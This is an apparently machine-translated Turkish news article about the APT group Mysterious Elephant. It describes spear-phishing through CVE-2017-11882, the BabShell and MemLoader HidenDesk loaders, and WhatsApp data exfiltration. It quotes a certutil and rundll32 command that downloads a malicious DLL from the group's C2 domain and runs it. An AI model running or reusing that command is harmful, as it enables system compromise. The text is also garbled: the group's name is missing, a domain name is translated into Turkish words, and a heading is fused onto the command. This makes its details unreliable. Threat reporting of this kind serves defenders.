Son aylarda, olarak bilinen yeni bir gelişmiş kalıcı tehdit (APT) grubu ortaya çıktı. Gizemli Fil Asya-Pasifik bölgesindeki hükümeti ve diplomatik kurumları hedef alan zorlu bir düşman olarak ortaya çıktı.
İlk olarak Kaspersky’nin Küresel Araştırma ve Analiz Ekibi (GReAT) tarafından 2023 yılında tanımlanan grup, tespitten kaçınmak ve uzun vadeli erişimi sürdürmek için hem özel olarak oluşturulmuş kötü amaçlı yazılımlardan hem de değiştirilmiş açık kaynaklı yardımcı programlardan yararlanarak araç setini geliştirmeye devam etti.
İlk göstergeler, silaha dönüştürülmüş belgeler sunan basit kimlik avı tuzaklarına işaret ediyordu, ancak son kampanya, hem dağıtım mekanizmalarında hem de istismar sonrası araçlarda önemli bir evrim sergiliyor.
İlk saldırılar, CVE-2017-11882’yi kullanan kötü amaçlı Office belgelerini içeren hedef odaklı kimlik avı e-postalarından yararlandı.
Kullanıcı etkileşimi üzerine bu belgeler, saldırgan tarafından kontrol edilen altyapıdan daha karmaşık yükleri alan hafif bir PowerShell yükleyicisini bırakır. Bu yükleyici, dublajlı BabShelltehdit aktörünün modüler çerçevesinin temelini oluşturur.
Kampanya 2025’e doğru ilerlerken Mysterious Elephant ikinci aşama bir yükleyiciyi entegre etti. MemLoader HidenDeskUzaktan erişim truva atlarını doğrudan belleğe enjekte ederek diskteki adli yapaylıkları azaltır.
Securelist analistleri, operasyonun sonraki aşamalarının, belgeler, resimler ve arşivler dahil olmak üzere hassas WhatsApp verilerinin, adı verilen özel filtreleyiciler kullanılarak sızdırılmasına odaklandığını belirtti. Uplo Süzücü Ve Stom Süzücü.
.webp)
Bu bileşenler, çalınan verileri HTTP aracılığıyla joker DNS etki alanlarına iletmeden önce XOR tabanlı gizleme ile kodlar. storycentral.net Ve muson konferansı.com.
Grup, meşru etki alanlarından ve HTTPS’den yararlanarak, kötü amaçlı trafiği normal kurumsal web kullanımıyla harmanlayarak ağ tabanlı algılamayı karmaşık hale getiriyor.
# Download and execute BabShell payload
certutil -urlcache -f "hxxp://storycentral.net/BabShell.dll" BabShell.dll
rundll32.exe BabShell.dll,EntryPointEnfeksiyon Mekanizması
Bulaşma zinciri, bir RTF belgesinde görünüşte zararsız bir toplantı daveti içeren hedef odaklı kimlik avı e-postasıyla başlıyor.
Belge açıldığında, Office Denklem Düzenleyicisi’nde (CVE-2017-11882) bir bellek bozulması güvenlik açığı tetikleniyor ve sessizce bir PowerShell işlemi başlatılıyor.
Bu PowerShell örneği gizli modda çalışır (-nop -w hidden) ve BabShell DLL yükleyicisini getirmek için .NET’in WebClient sınıfını kullanır.
Yüklendikten sonra BabShell, C2 URL’lerini ve modül adlarını içeren yerleşik yapılandırmasının şifresini çözer ve ardından C2 URL’lerini ve modül adlarını içerir. EntryPoint bir kalp atışı kanalı oluşturmak için dışa aktarın.
İlk işaretlemenin ardından BabShell, MemLoader HidenDesk modülünü getirerek onu bir sistem hizmet sürecine enjekte eder.
Bu bellek içi yükleyici, özel bir paket biçimini ayrıştırır, RAT yükünün sıkıştırmasını açar (Remcos’un bir çeşidi) ve yürütmeyi yeni eşlenen koda aktarır.
MemLoader HidenDesk, diske yazma işlemlerini önleyerek kinetik kanıtları önemli ölçüde azaltır ve Mysterious Elephant’ın yana doğru gezinmesine ve hedef verileri tespit edilmeden toplamasına olanak tanır.
Grubun açık kaynak kod tabanlarını kullanması, tescilli değişikliklerle birlikte, hem becerikliliğin hem de teknik gelişmişliğin altını çiziyor.
Mysterious Elephant, bu çok aşamalı enfeksiyon taktikleri aracılığıyla, hassas bilgileri korumakla görevli güvenlik ekiplerinden eşit derecede uyarlanabilir savunma stratejileri talep ederek yaklaşımını geliştirmeye devam ediyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
